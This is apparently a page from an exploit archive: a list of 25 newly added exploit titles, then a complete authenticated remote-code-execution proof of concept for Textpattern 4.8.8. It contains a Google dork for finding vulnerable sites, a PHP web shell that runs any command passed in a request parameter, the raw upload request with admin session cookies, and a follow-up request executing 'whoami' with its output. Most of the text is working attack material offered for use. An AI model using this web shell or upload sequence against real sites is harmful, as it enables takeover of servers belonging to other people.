
25 changes to exploits/shellcodes/ghdb EQ Enterprise management system v2.2.0 - SQL Injection qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS) ASKEY RTF3505VW-N1 - Privilege Escalation Bangresto 1.0 - SQL Injection Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated) Cacti v1.2.22 - Remote Command Execution (RCE) Judging Management System v1.0 - Authentication Bypass Judging Management System v1.0 - Remote Code Execution (RCE) rconfig 3.9.7 - Sql Injection (Authenticated) Senayan Library Management System v9.0.0 - SQL Injection Spitfire CMS 1.0.475 - PHP Object Injection Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated) WooCommerce v7.1.0 - Remote Code Execution(RCE) CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Denial Of Service (DoS) SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authorization Bypass (IDOR) SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Exploit SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution (RCE) SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset SOUND4 Server Service 4.1.102 - Local Privilege Escalation macOS/x64 - Execve Null-Free Shellcode
132 lines
No EOL
4.1 KiB
Text
132 lines
No EOL
4.1 KiB
Text
# Exploit Title: Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)
|
|
# Exploit Author: Alperen Ergel
|
|
# Contact: @alpernae (IG/TW)
|
|
# Software Homepage: https://textpattern.com/
|
|
# Version : 4.8.8
|
|
# Tested on: windows 11 xammp | Kali linux
|
|
# Category: WebApp
|
|
# Google Dork: intext:"Published with Textpattern CMS"
|
|
# Date: 10/09/2022
|
|
#
|
|
######## Description ########
|
|
#
|
|
# Step 1: Login admin account and go settings of site
|
|
# Step 2: Upload a file to web site and selecet the rce.php
|
|
# Step3 : Upload your webshell that's it...
|
|
#
|
|
######## Proof of Concept ########
|
|
|
|
|
|
========>>> START REQUEST <<<=========
|
|
|
|
|
|
|
|
|
|
############# POST REQUEST (FILE UPLOAD) ############################## (1)
|
|
|
|
POST /textpattern/index.php?event=file HTTP/1.1
|
|
Host: localhost
|
|
Content-Length: 1038
|
|
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
|
|
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMgUEFltFdqBVvdJu
|
|
X-Requested-With: XMLHttpRequest
|
|
sec-ch-ua-mobile: ?0
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
|
|
sec-ch-ua-platform: "Windows"
|
|
Origin: http://localhost
|
|
Sec-Fetch-Site: same-origin
|
|
Sec-Fetch-Mode: cors
|
|
Sec-Fetch-Dest: empty
|
|
Referer: http://localhost/textpattern/index.php?event=file
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
|
|
Cookie: txp_login=admin%2C94d754006b895d61d9ce16cf55165bbf; txp_login_public=4353608be0admin
|
|
Connection: close
|
|
|
|
------WebKitFormBoundaryMgUEFltFdqBVvdJu
|
|
Content-Disposition: form-data; name="fileInputOrder"
|
|
|
|
1/1
|
|
------WebKitFormBoundaryMgUEFltFdqBVvdJu
|
|
Content-Disposition: form-data; name="app_mode"
|
|
|
|
async
|
|
------WebKitFormBoundaryMgUEFltFdqBVvdJu
|
|
Content-Disposition: form-data; name="MAX_FILE_SIZE"
|
|
|
|
2000000
|
|
------WebKitFormBoundaryMgUEFltFdqBVvdJu
|
|
Content-Disposition: form-data; name="event"
|
|
|
|
file
|
|
------WebKitFormBoundaryMgUEFltFdqBVvdJu
|
|
Content-Disposition: form-data; name="step"
|
|
|
|
file_insert
|
|
------WebKitFormBoundaryMgUEFltFdqBVvdJu
|
|
Content-Disposition: form-data; name="id"
|
|
|
|
|
|
------WebKitFormBoundaryMgUEFltFdqBVvdJu
|
|
Content-Disposition: form-data; name="_txp_token"
|
|
|
|
16ea3b64ca6379aee9599586dae73a5d
|
|
------WebKitFormBoundaryMgUEFltFdqBVvdJu
|
|
Content-Disposition: form-data; name="thefile[]"; filename="rce.php"
|
|
Content-Type: application/octet-stream
|
|
|
|
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
|
|
------WebKitFormBoundaryMgUEFltFdqBVvdJu--
|
|
|
|
|
|
############ POST RESPONSE (FILE UPLOAD) ######### (1)
|
|
|
|
HTTP/1.1 200 OK
|
|
Date: Sat, 10 Sep 2022 15:28:57 GMT
|
|
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
|
|
X-Powered-By: PHP/8.1.6
|
|
X-Textpattern-Runtime: 35.38 ms
|
|
X-Textpattern-Querytime: 9.55 ms
|
|
X-Textpattern-Queries: 16
|
|
X-Textpattern-Memory: 2893 kB
|
|
Content-Length: 270
|
|
Connection: close
|
|
Content-Type: text/javascript; charset=utf-8
|
|
|
|
___________________________________________________________________________________________________________________________________________________
|
|
|
|
############ REQUEST TO THE PAYLOAD ############################### (2)
|
|
|
|
GET /files/c.php?cmd=whoami HTTP/1.1
|
|
Host: localhost
|
|
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
|
|
sec-ch-ua-mobile: ?0
|
|
sec-ch-ua-platform: "Windows"
|
|
Upgrade-Insecure-Requests: 1
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
|
Sec-Fetch-Site: none
|
|
Sec-Fetch-Mode: navigate
|
|
Sec-Fetch-User: ?1
|
|
Sec-Fetch-Dest: document
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
|
|
Cookie: txp_login_public=4353608be0admin
|
|
Connection: close
|
|
|
|
|
|
############ RESPONSE THE PAYLOAD ############################### (2)
|
|
|
|
HTTP/1.1 200 OK
|
|
Date: Sat, 10 Sep 2022 15:33:06 GMT
|
|
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
|
|
X-Powered-By: PHP/8.1.6
|
|
Content-Length: 29
|
|
Connection: close
|
|
Content-Type: text/html; charset=UTF-8
|
|
|
|
<pre>alpernae\alperen
|
|
</pre>
|
|
|
|
========>>> END REQUEST <<<========= |